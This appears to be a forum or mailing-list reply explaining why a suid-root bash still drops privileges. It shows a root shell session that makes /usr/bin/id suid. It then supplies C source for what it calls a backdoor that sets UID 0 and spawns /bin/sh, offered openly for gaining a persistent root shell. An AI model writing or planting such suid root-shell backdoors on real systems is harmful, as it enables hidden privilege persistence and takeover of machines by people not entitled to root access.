because the suid bit influes only the Effective UID, and there is somewhere in the
bash code a setuid(getuid) to drop root rights (if executed by non root)
try /bin/bash1 (I have this on my slack 8) or other shell ; they might give you your
expected rootshell.
look at this :
bash-2.05# id
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),16(halt)
bash-2.05# chmod +s /usr/bin/id
bash-2.05# exit
bash-2.05$ id
uid=1000(spacewalker) gid=100(users) euid=0(root) egid=1(bin)
groups=100(users),16(halt)
if you want to program a little backdoor who gives you a rootshell, you have to set
your uid to 0. the kernel will give you the uid 0 because you have the 0 euid
effect :
#include <stdio.h>
int main(){
setuid(0);
if(getuid()){
printf("program not suid root\n");
} else {
system("/bin/sh");
}
return 0;
}
I hope I respond to your question...
